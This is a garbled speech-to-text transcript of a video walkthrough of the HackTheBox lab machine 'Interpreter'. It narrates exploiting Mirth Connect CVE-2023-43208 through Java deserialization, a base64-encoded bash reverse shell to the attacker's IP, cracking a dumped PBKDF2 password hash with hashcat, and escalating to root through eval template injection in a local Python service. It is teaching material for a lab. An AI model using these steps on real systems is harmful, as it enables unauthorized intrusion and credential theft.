HackTheBox - Interpreter

Added: 2026-06-01

[00:00:00]What's going on YouTube? This is IPSC and today we'll be doing interpreter from hack the box which is a pretty straightforward box that starts off with a CVE exploiting mirth connect. I think the vulnerability is actually pretty interesting because it's a Java dialization vulnerability where we craft the gadget from XML. It just looks pretty cool. Anyways, that leads us to a shell on the box and we can dump the database to reveal a hashed password, but it's stored in a little bit of an odd way. Looking at the source code reveals how we can convert this into a hashcat format that leads us access to another user. This user can read a Python script that's listening on a local socket. The vulnerability is really odd but straightforward. They created their own templating engine that does like a triple fstring. It sounds complicated but it's pretty straightforward to enumerate and exploit. So with all that being said, let's just jump in. As always, we can start with an end map. So - sc for default scripts. SV enumerate versions-reason.

[00:00:49]This will give us things like the TTL OA output all formats put in the end map directory and call it interpreter. and then the IP address of 101296.19.

[00:00:59]This can take some time to run, so I've already ran it. Looking at the results, we have just three ports open. The first one is SSH on port 22, and the banner tells us it's a Debian server. We also have HTTP on port 80. its banner is not telling us the web server and outputting like everything as it did a regular network connection which leads me to believe end mapap doesn't have this like web server's user agent listed as HTTP so it just does odd things right so we have like this fingerprinting a 404 request um I'm going to see what the user agent is in a second uh we also have 443 open and that looks to be it so let's go ahead and see what this um user agent is so I'm going to do a curl-ash I I I think this is going to show headers.

[00:01:44]Uh, http 101296.19.

[00:01:49]There we go. And we see there is no server header. So I think that's why end mapap kind of like went crazy there. Um, yeah, let's try https real quick. I'm going to add dash k so we ignore SSL make a request. And yes, there is no server header. So I think that's why end mapap is behaving that way. But let's just go ahead and take a look at this web server. So I'm going to go to https.

[00:02:12]We can probably go to HTTP as well. It's probably both the same. Um, let's just go to HTTP just to make sure. Yes, it is. And I'm going to make a request to this full page. So, let's just go ahead and do the same curl. I'm curious if we return a page if we get anything else.

[00:02:32]Um, there is no server header, but we have J session ID. So, we know this is going to be a Java web app, right?

[00:02:40]It is Mirthth Connect administrator. If we download the application here where it says launch Mirthth Connect, I'm going to download it. That is a JNLP.

[00:02:48]That's some like weird Java technology that I don't think is really used that much anymore. Uh what was that download name? Web start. Why did that not move?

[00:02:59]Okay.

[00:03:01]But whenever I see this, I always hate it because it's always a pain to open this type of stuff on Linux. But we don't really have to because we can see it's exposing the version right here 4.4.0 and that is mirth connect. So if we search Google for mirth connect 4.4.0 um I'm going to call it CVE. I guess we could also go to like MITER and things like that and search it but this is probably the better resource. Um, if we go here, um, this is going to be a 2023 CVE, which is a little bit old. Um, let's see. Latest patch 441.

[00:03:43]It's not going to give us the actual vulnerability here, but it does give us a detection. And this is also going to leak the version. We got it out of the JNLP, but let's just go ahead and um copy this and see what it looks like, right? So if I just do a um curl, let's do HTTP 101296.19.

[00:04:08]We get an error message um not found. So let's do HTTPS. Maybe there is a difference between HTTP and HTTPS. Um we got an error again, but this time it's a 400 error. And let's see. All requests must have x requested width. So, that's a little bit odd, but let's add the header. And if we looked at that blog post, it does um have that. I'm just going to call this pone. It doesn't really matter what we call it. And it returns 440, right? We can see here they're doing X request with open API.

[00:04:40]But yeah, that is um the testing the version. We found the version two different ways. If we go just to um the API, so let's just go to slash API. It's going to give us a Swagger looking like interface. Maybe it is Swagger right here. Uh yeah, Swagger documentation of how to actually use this API. But let's go ahead and um find that CV again. I'm just going to go CVE 2023.

[00:05:10]Um shoot u Mirthth Connect. What was the number?

[00:05:16]Uh 43208.

[00:05:18]43208.

[00:05:22]And there is a good write up on Horizon AI again. Um, let's see if I can find it really quick.

[00:05:29]Horizon nextG. Maybe this.

[00:05:33]Yeah. So, this is talking about it. They have, I guess, two vulnerabilities. One was like a incomplete patch. Um, see, I'm not going to get too far into the weeds, but I think this one, let's see, Mirthth Connect 411 was vulnerable to Java derialization. and it took this XML and then we can see us building a like serialization string between Java lang comparable to event handler to process builder to running a process.

[00:06:02]There was a patch that prevented us from um loading like Java lang process builder. I don't know exactly all the details there off the top of my head but they find a different way to get code execution using I want to say it was like hibernate or something. But we can see uh common collections. Yeah, not hibernate. Common collections invoke transformer and they find a different path to um get rce right when you ever like des serialize user input um you always have a huge like attack surface especially with languages like Java. Uh Python I think it's a little bit safer as long as you're not using pickle. Like there's a way to do d serialization safe. Um I think protobuff is safe.

[00:06:47]Pickle is not safe. Um, JSON's relatively safe most of the time, but uh, Java definitely does suffer from dialization attacks quite often. So, let's go ahead and look at this proof of concept. I'm going to run this a little bit oddly because I don't want to run the payload and just get a shell. I want to do it like look at what it's building and then we'll manipulate it slightly.

[00:07:10]So, I'm going to call this gen pi. Paste this. Just make sure we can run it. Awesome. Let's do a dash u. I'm gonna point to localhost.

[00:07:23]Uh let's just do 9001 and then c the command. I'm just going to do an ID command. So let me listen on 9001 so I can grab this payload.

[00:07:32]Awesome. Uh I guess it showed me the payload. Let's see.

[00:07:41]Make the thing smaller.

[00:07:44]Copy.

[00:07:47]Why is that not I can make my terminal smaller but not bigger. Um, that's weird. But let's just try creating a new tab. That seems to have fixed it. Let me reopen T-Mox.

[00:08:00]Awesome.

[00:08:02]And then I'm going to do vp payload.ext.

[00:08:06]Paste this just so we have it.

[00:08:09]And then we can go and look at this.

[00:08:12]Right. So it makes a request to slash users and sends this XML. So we can do this post create a new user and try it out. Paste our XML.

[00:08:27]And if we go to execute, we get a server error. I don't know if that is good or not. Um, what I'm going to try is a ping first. So we'll do ping. And on Linux, I never remember if it's - C or dash N. The flag on Windows and Linux are different. Um, it is a C for Linux. And we want to go 10 10 14. I think I'm 179 171.

[00:08:55]Awesome. Let's do a TCP dump I ton zero um MP. Make sure we run that with pseudo. And I'm also going to add dash N. So I did this to switch like maybe we don't get the output of the command. So this is going to be like a blind execution to see if we executed code and we did because we have one ping back and forth. So now we have a way to execute commands. Um Java d serialization's a little bit odd um because we can't just do a straight reverse shell. Um we have to encode it because there's a lot of just bad characters. Now, the other odd thing is Java for some reason treats these quotes a little bit oddly. If you go to IPSC.rocks, I learned it from uh we go to YSO serial like building a reverse shell payload that works with it. I go about all the details here. I don't fully remember exactly why. Uh there is a YSO serial- modified that kind of fixes it and talks about it. It is really old, so I'm not positive if it'll still be here. Um, yeah. So, it talks about the issue, but essentially because Java, I think, is pretty much not using these quotes, it breaks it. And we need those quotes normally for reverse shell payload because we do bash C to put it inside of bash. And then we do this so the command doesn't get delimited. And each of these um doesn't get treated as a new argument, right? We just want to pass one big string. Um we can't use quotes in Java. So what we do is end up replacing quotes with this magically works. Um because ifs by default is going to be a space. So we can get around that limitation. Now the other thing is our bash reverse shell has a lot of bad characters by default.

[00:10:50]Um so we're going to use B 64 to encode it to remove all them. So, let's just go with um I'm gonna call it uh rev.ext. I guess it doesn't really matter, but I want to give it bash- and then what is it? I got to type this out. B- c- i dev tcp 1010 14171 90001. It's funny how my muscle memory works that I actually have to um type it like that.

[00:11:22]And now that I'm thinking about it, do we have to just want this string? Yeah, I didn't need to create rev.ext in hindsight, but oh well, because we could have done that with an echo. But what I'm doing now is I want to um get rid of any special character. And it's easier to do it as echoed in hindsight.

[00:11:50]base for W0. Let's do a dash N. There we go. So, we want to get rid of this space. That space is probably there.

[00:11:59]Awesome. And then we have a few equals at the end. That is just padding. So, now we have a pure alpha numeric. Um, pluses sometimes get treated oddly in um HTTP. So, that's why I want to get rid of that. So, we have this. So, what I want to do is go back to here and we're going to get rid of these quotes. And I'm going to do a echo. Then we say IFS- NFS um paste.

[00:12:33]Then base 64 ifs D and pipe to bash. And if we did this correctly, we will get a reverse shell hopefully. So, NC LVMP 90001.

[00:12:49]Let's go ahead and send this.

[00:12:53]And there it is. We have the shell. So, let's fix TTY. So, I'll do Python 3- C import pty. I need a space there. pty pty.spawn bin bash. There we go. I'll do control- Z to background it. sty raw minus echo foreground enter enter and then want to export term is equal to xterm which will let me clear the screen. Awesome. So we landed on a web server. The first thing to do is try to find the database so we can start dumping things. Um I'm going to go in the config directory because that's normally where like configurations are stored. And then we can do lsla and there is a mirth.properties. So let's go ahead and take a look at this. Um let's see. we see database and database password. So, right off the bat, we could One thing I like doing though is just hiding comments and files. So, we'll do a GP-V anything that starts with a comment and then uh we will do a grap period for um things on the line, right? So, we can see the database information. It talks to um 3306 on local host. The database name is MCBD prod. Um, let's see. Is there anything else in this config?

[00:14:10]HTTP host. Uh, we have the key store.

[00:14:13]So, if we don't get anything from the um database, I'd probably start going into the key store that has normally like certificates, other things. We have the um key store us uh passwords. So, we could decrypt it if we wanted to, but most of the time uh the database is good. So, let's do my SQL-U mirth DB.

[00:14:34]Um, I also have to add -p for password.

[00:14:36]We will copy this.

[00:14:39]Paste it in. And then I'm gonna do show databases because I forgot the database name. Let's do use. We will just copy this.

[00:14:50]And now we can do show tables.

[00:14:53]I'm going to do a selector from person.

[00:14:58]And I don't like the way that did. So, I'm going to do back slash capital G, which is a weird thing in SQL, but this puts it in more of a human readable format. And we don't see really that much. We have the username, but nothing about passwords. So, if I look back at the tables, there is a person password.

[00:15:19]So, let's do select stir from U person password.

[00:15:26]And we have the password here. Now, this looks like it's B 64 encoded. So, let's do an echo B 64-d.

[00:15:34]And it's gibberish. So, this is probably going to be some type of encryption. So, at this point, we have to figure out exactly um how this is stored. And Mirthth Connect is open source. So, if we do Mirthth Connect GitHub, we can probably pull it. And then we will clone it down to our box.

[00:15:55]So we can do a getit clone because I don't think it's going to be trivial to just um look at the source code through all these directory structures because I don't know how Java is stored that well. Um can we do controllers?

[00:16:11]We could. Um normally like in Java I like looking at controller because that tells us where like the data classes and things like that are. We probably want default user controller. Um, I guess we'll see if we can how far we can go with this. Collapse that. So, user controller. Let's see what do we have.

[00:16:33]Reset user status. Get users.

[00:16:37]Update user.

[00:16:40]Check or update password. That sounds like it's probably going to be good. And let's see. Digtor.

[00:16:47]So, we probably want to look at this.

[00:16:50]Uh, can we easily get to this file?

[00:16:54]I do not know exactly how to. We can just go to this this. Um, what I would normally do is grab dash i controller uh find grap- i controller.

[00:17:15]Then we probably find the user controller here. And then what do we want? the digest. So, we'll go back to that find digest.

[00:17:24]Let's see. That is probably going to be under we got digest authenticator probably digtor.

[00:17:34]Java and let's see what do we have here. So, under the digtor we see the algorithm.

[00:17:41]This is going to be PBKDF2 with HMAC Shaw 256. So, let's see if Hashcat supports this. So, I'm going to go to my Kraken where I have hashcat running and I'm going to do dot slashhashcat example hashes and let's do grap um what is it? PB KDF.

[00:18:05]So, PB KK DF2 PBK.

[00:18:14]There we go. I'm going to do a grap on name because we don't care about example hash right now. We have a lot. Um, we also wanted was it Shaw 256. So, I'm just going to do a GP- I Shaw 256.

[00:18:32]And that gets us down a lot. Um, let's see. We're not doing Cisco, not doing Django. Probably this PBKDF2 HMAC Shaw 256.

[00:18:42]um PBK DF2 HMAC Shaw 256. So this looks like a good starting point. So if we do um a GP on that and let's see well let's just do a less and then we can search to get exactly what we want.

[00:19:00]Okay, so it's going to be hash mode 10900. Probably we have to get Shaw 256.

[00:19:06]Then this is most likely going to be iteration. This is going to be the salt and this is going to be the actual data.

[00:19:13]So that's what we want to get from this.

[00:19:16]The salt is looking like eight characters and the iteration is 600,000.

[00:19:22]So let's go back here. Uh we can grab the password again and we want to echo B64-d.

[00:19:32]So we have the payload. Now the salt is going to be eight bytes. So, it's probably going to be this. And then the encrypted password is going to be this. Or I should say hash password because it's not encryption. So, what we want to do is find a good way to just grab bytes out of this, right? And I like using head and tail for this. So, I'm just going to do this as a quick demo. Um, let's do this.

[00:19:58]If I do tail- c3, it's going to get me the last three characters. Why did it only give me two?

[00:20:05]because I forgot the dash n so it counted the line break as one. If I do this a dash n there we go we have the last three. Now I can also use head right. So that gets me one two three out of that. So we wanted the first eight.

[00:20:20]So there we go. So we can do this and that's going to get us the salt. So, let's go back to our base 64 and I'm going to do head- c8 because the salt was 8 bytes. And then we're going to base 64 again. And that is going to be the salt.

[00:20:44]Um, it's kind of funny. Uh, of course it doesn't change much because this is base 64. So, the salt looks very similar, right? Um, this character is different because we have padding here. It's a D because it has more characters. So, the um padding doesn't matter, right? But that's going to be the salt. And now we just need the password. And we want to grab everything but the um first date, right? So, let's go back to our command.

[00:21:17]So if we do a tail, there's also a plus command.

[00:21:24]So if we do tail plus one, let's do plus two. There we go. Um I guess plus one shows the whole string.

[00:21:35]So we always want to increment by one.

[00:21:37]But our goal right here is to show.

[00:21:43]Was that right?

[00:21:45]I think I just did it. Maybe it's plus.

[00:21:49]Yeah, we want plus nine, right? Because we want to ignore these.

[00:21:56]So if we kept going on, so like A B CDE E F that is always going to ignore um the first eight characters and give us everything afterwards.

[00:22:12]At least I think that's what it's doing.

[00:22:13]We'll see. Let's just go ahead and try this out. So instead of the head there, we're going to do tail- cine.

[00:22:22]That's going to start us at the ninth character of this. And this is going to be the password. So if we cat the password, that's what it looks like. If we cat the salt, that's what it looks like. And what we have to get is this.

[00:22:37]So we'll do shot 256 colon. Then the iterations, which I think we said was um 600,000. Yes, that's what it looks like.

[00:22:46]So 60 O.

[00:22:51]The salt is going to be this.

[00:22:55]Then the password is this.

[00:22:59]So I think we have recreated this password hash. So let's go ahead and copy this and 10 900. So, dot slash hashcat dash m 10900 word list opt word list rocku.ext and then the hash file.

[00:23:27]Do I give it this? I'm actually blanking on how to use hashcat. Uh, let's see. I think I can just do this for a word list. We'll see if this works.

[00:23:42]Um, this is just shorthand for run this command. Treat it as a file. And I just got to change the word list and that location opt word list rocku.ext. There we go.

[00:24:01]Hash file is empty or corrupt.

[00:24:04]Okay. Well, let's go ahead and create this file that does not work apparently.

[00:24:14]I just want to see something real quick.

[00:24:16]Did I do this correctly? I think I did.

[00:24:20]Yeah. Oh, well. Um, v hashes interpreter paste this And we can say hashes interpreter.

[00:24:42]Hopefully it starts cracking. There we go. Looks like it has started. How long does this say it's going to take?

[00:24:50]I don't see a time.

[00:24:56]Maybe I'm blind. That's very possible.

[00:24:58]uh up to 30 minutes.

[00:25:01]So, I'm going to just pause the video real quick. It shouldn't take anywhere near that time. Um as long as we did all of this correct. As long as like this piece is Let's see. Shaw.

[00:25:15]Should we just double check that really quick?

[00:25:18]Um I don't even know how we would double check that.

[00:25:22]Let's see.

[00:25:27]Let's go here real quick. I guess we can do this.

[00:25:33]So, where is our tail plus C?

[00:25:39]Okay, so we said we wanted to grab everything skipping this and we did not accomplish that. Where's 5973 start?

[00:25:56]This is the same payload.

[00:26:06]We have more something's not making sense.

[00:26:13]We did tables dash C and we actually got more data.

[00:26:18]It cracked. Um, I'm not exactly sure what I'm doing here. I wish I did not show that, but uh, we did it correctly. Um, that'll make more sense to me, I'm sure, right after I'm done recording and look over this. But, uh, looks like the password is snowflake one. So, let's go ahead and look at the user again.

[00:26:44]So, we'll do person that is Cedric. So let's go ahead and try sshing. So we do ssh uh 10129.

[00:26:53]What is this IP of the box? Uh 6.19 CRI at Cedric at 101296.19 allowed. Paste. And we get logged in.

[00:27:11]Awesome. But this is really bothering me. What did we screw up?

[00:27:16]Uh, let's see. We echo, we decode, we tail, we encode.

[00:27:24]Hold on.

[00:27:29]Invalid B 64.

[00:27:35]Of course, we don't have to touch base 64 again. That was our mistake. There we go. I think this is going to work. Um, I don't know how I made that mistake.

[00:27:47]Let's see.

[00:27:50]B64-D XXD. This is the payload.

[00:27:57]This is us chopping off the first eight bytes.

[00:28:02]Awesome. So, we get rid of this and we start at 62C8. There we have it.

[00:28:09]um so easy to screw up when we like do all this manually in bash. Um normally I would use like cyershe or something like that and it would make it so much easier to see. Um but yeah, the mistake we did was like after we did this we reid base 64 and then did xxd which of course adds length. So that all makes sense. Um I I don't know what I was thinking but let's go ahead and see what we have here as seedric. So let's see what we have in our home directory. So I'm just going to go find dot- type f and just the flag.

[00:28:44]So we could also see what's just running on this box. And we see something on uh 3306. That's my SQL 54321 on local host.

[00:28:54]And then we missed port 661 on um our end map. This is going to be part of Mirthth Connect. Um not too important to look at it, but this is somewhat interesting. 54321. So, let's go ahead and go into Etsy. We're going to grap for 54321 and we're going to hide error messages.

[00:29:14]So, two Yeah, I think this is how uh we need a period there and recursive. So, just looking through all the files in Etsy for that. We don't have anything. So, let's see. Um, we could just look at PSF grap 54321. See if it's leaked there.

[00:29:35]It's not uh so let's do psf-forest and start looking at processes.

[00:29:44]Okay. So let's see uh Laurel is running that is an audit d thing VMware tools.

[00:29:51]We can see our reverse shell right here.

[00:29:53]Oddly enough we have uh fail to ban. So that's interesting.

[00:29:59]See what else we have this nodef.py running as root. So let's go ahead and put this on a clipboard because that is definitely interesting.

[00:30:10]Anything else? No. So let's look at this file. So we'll do lsla on it. We can see um it's root owned and the group Cedric can read um read it. If we just did a findine dot um dash group cedric and and hide error messages.

[00:30:32]Uh we need to do slash. This is a good way just to see like interesting files around your user.

[00:30:40]You will probably want to do a gp-v.

[00:30:43]And then let's hide things from uh cis. And you probably um should know fi the find command better than me and put exclusions in. But if you're lazy, you just pipe it over to um GP and do exclusions this way because this is easy.

[00:31:05]And there we go. Um we can see everything in the home directory. And then we have this node.py.

[00:31:11]So let's go ahead and take a look at it.

[00:31:13]Uh we don't have Vim. That's annoying.

[00:31:16]So let's see.

[00:31:18]Right off the bat, I see this big comment, which leads me to believe it's going to be um AI generated. I don't know why this is just I guess it's a normal way to do comments. Um it just looks odd to me. I don't know what about it. Maybe it's not AI. We don't have comments on each of these functions. But let's see. So, we have template and something that sticks out really odd. Um we see eval. So it is doing a double f string I want to say.

[00:31:51]So we get f uh double quote then another f string and then we're going to the template. So I guess we have like which is we got like three fstrings going on in this um attack. I weird. So it looks like it's doing some type of template injection I guess. So if we put a like something in here, we get passed over to EVEL and we can get code execution most likely. Uh let's see, we have add patient.

[00:32:20]So that is going to be what calls this weird template. I I don't understand it, but I think we can attack it. Uh so let's see. We have to make a request to this port. Um, it has to come from 127001 and it is XML. So, what I'm going to do real quick, let's just do a um I to get into this SSH thing. If the first thing you type is this, it drops you into that prompt. And then I want to say it's not going to be - D. Um, I think it's a local port for it, right?

[00:33:00]So, DL. Um, I'm just going to call this What port was it?

[00:33:11]Uh, 54 321.

[00:33:16]5 4 3 2 1. Okay, so I think now I should be able to hit this port locally.

[00:33:26]Let's just exit this so we don't have it anymore. There we go. curl 127001 54321.

[00:33:35]Awesome. So that's now going through um my proxy. So let's do curl visit-x http127001 8080. I want to get this going through burpuite so we can start playing with this easily.

[00:33:56]There we go.

[00:33:58]Did I send to repeater? I didn't.

[00:34:03]I turned intercept off.

[00:34:07]Repeater.

[00:34:09]Okay. So, what do we want to do?

[00:34:14]Let's go back into this and we want to make a post request to add patient. So, let's change the request method.

[00:34:24]Add patient.

[00:34:26]XML error.

[00:34:31]So let's see if we can't parse we return XML error.

[00:34:37]So we want to give a patient tag I guess still XML.

[00:34:53]That's XML text.

[00:34:58]Find patient. No patient.

[00:35:04]So, I'm not exactly sure what's going on, but we're not even making it this far. So, we are getting a parser error, and all we're doing is these two lines.

[00:35:14]So, my guess is the way we're returning data um does not put in the right format here to decode it. Um, we do application as long as it's not URL form encode. Oh, that makes sense because if it's URL form encoded, it's like um expecting it to be like input is equal to and that's probably where it's erroring. So, as long as we give it some type a different content type, it works just fine. I bet JSON will fail because it's expecting JSON data. Nope, JSON worked. I was expecting that to fail. Um, but anything here um seems to work. I'm just going to put XML because it is XML data. But it just can't be that Xubdub URL form encoded because I'm guessing um I'm guessing this is flask was probably work zug on the back end or something like that just parsing this data oddly. Um but now we have this XML. If uh patient's not there, we get something.

[00:36:15]But we know we need patient because that's what it's trying to go for. So, we want to get first name, last name, sender app, timestamp. This is annoying.

[00:36:25]Um, first name.

[00:36:33]Then we want what is it? Last name.

[00:36:39]And these should all be one line.

[00:36:46]Uh, this needs to be a slast name.

[00:36:52]Okay, the next field is sender app.

[00:37:00]Sender app.

[00:37:02]I wonder if there's a better way to do this. Like I could just probably copy this string into Python and then have it output um XML. That's probably a smarter way to go about it.

[00:37:14]Let's go timestamp.

[00:37:18]And again, my habit is always hitting enter and putting things on a new line.

[00:37:25]So, birth date and then gender.

[00:37:31]Birth date.

[00:37:36]And this could also maybe if this doesn't work, I'm going to try like um camelc casing it or things like that. I know some serializations like they treat these underscores oddly. Um, but I think this should be fine.

[00:37:52]This all needs to be one line, I think.

[00:37:55]Invalid input.

[00:37:58]So, first name ABC def.

[00:38:03]Um, sender app is something timestamp. Does it say? What do we do with time stamp?

[00:38:21]Let's see. Time stamp. How are we using this?

[00:38:30]It's probably going to be here. Let's see. Date time now. Year of birth. Um 2026 0101 maybe.

[00:38:41]Oh, that's probably birth date.

[00:38:48]Um, I'm going to call it gender. Still have invalid input.

[00:38:55]We have something wrong. First name, last name, sender, app text tag.

[00:39:10]So patient, first name, last name, sender, app, time stamp, birth date, gender. I definitely have everything. I must have like invalid data. It's saying invalid input. So of course, um, let's see. Invalid input. Where does this actually get raised over here? Um, oh, data birth format is day, day, month, month, year, year.

[00:39:33]Okay.

[00:39:35]So, we'll do 01 01 2026.

[00:39:41]Okay. Well, we got that done.

[00:39:45]What else do we have?

[00:39:49]Is sender app ever used?

[00:39:53]Sender?

[00:39:57]I don't think sender app is used.

[00:40:01]I think time stamp is the next thing that could be odd.

[00:40:07]Let's just make sure time stamp is an integer. Okay, that works. So our patient is this. That's mine. Um, so let's see what do we have. We're now in template. So we're doing an eval. So if we do gender is 1 + 1.

[00:40:33]Okay, that didn't work. Put it in single quotes. There we go. So now we have um it actually doing this um eval for us.

[00:40:44]So the next step is to try to um like import a gadget. So let's go with um underscore_imp import.

[00:40:56]And let's see, can we do OS?

[00:41:01]Uh, we have that in capitals.

[00:41:05]So the module is frozen. So that is good for us. So what we want to now do is um call something out of OS. So that'll be like uh pop. So we can do OS. Process open. We'll say ID and I think we call read. There we go.

[00:41:30]Now we have um code execution. So if we did echo test here, we have invalid input um echo plus test um we got nothing. So we're having trouble right now um with spaces. So space appears to be a bad character. I wonder if we can do like the IFS. We probably can't because this is um Python, not Bash, right?

[00:42:02]So, let's see. So, we have to now get around um not being able to do um spaces. So, again, like we did in the last one, uh we can base 64 encode things. So if we do a process open and then we say um we'll import then base 64 and then we want to do a B64 decode like this. I want to say um let's go ahead and echo N ID B 64 encode this AWQ that's going to be what ID is um let's see decode.

[00:43:00]There we go. So now we have a way to put spaces in here hopefully. So I'm just going to test this out with a echo-n echo please subscribe.

[00:43:15]Uh let's end this quote.

[00:43:18]So if it says please subscribe is our gender then we definitely have this right. Right.

[00:43:28]There we go. So now let's get a um shell.

[00:43:34]So let's just do echo-n um do we have that? I don't have it still. Um is it here?

[00:43:45]It is. Awesome.

[00:43:48]Whoops. Let's just go ahead and copy this.

[00:43:59]Copy this whole string.

[00:44:03]Then let's see.

[00:44:08]Let's just replace this with spaces again because we can use spaces.

[00:44:25]That should be fine.

[00:44:33]Let's make sure there's no line breaks.

[00:44:37]Copy this.

[00:44:40]Let's go back to Burp.

[00:44:43]Paste this in.

[00:44:50]send it. It is hung because we have a shell. Awesome. So, if we go to root, we can get root.ext. And that is going to be the box. Um, there's one thing I want to look at really quick. Um, as I was doing this, I was like, wait, did we even have to do that password cracking step? Because you can definitely see the port is open as um the web user, right? So if we send a post request here, we get XML error. So if we give it um bad XML, can we piece together errors? Um no patient tag found. So let's give it a patient invalid input. So okay, um there's no way for us to actually reverse this because the error message is not reversed. Um I was just wondering if we could just work through error messages building this XML payload, but you can't. you have to pretty much um read that file and only Cedric can read that file. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care and I will see you all next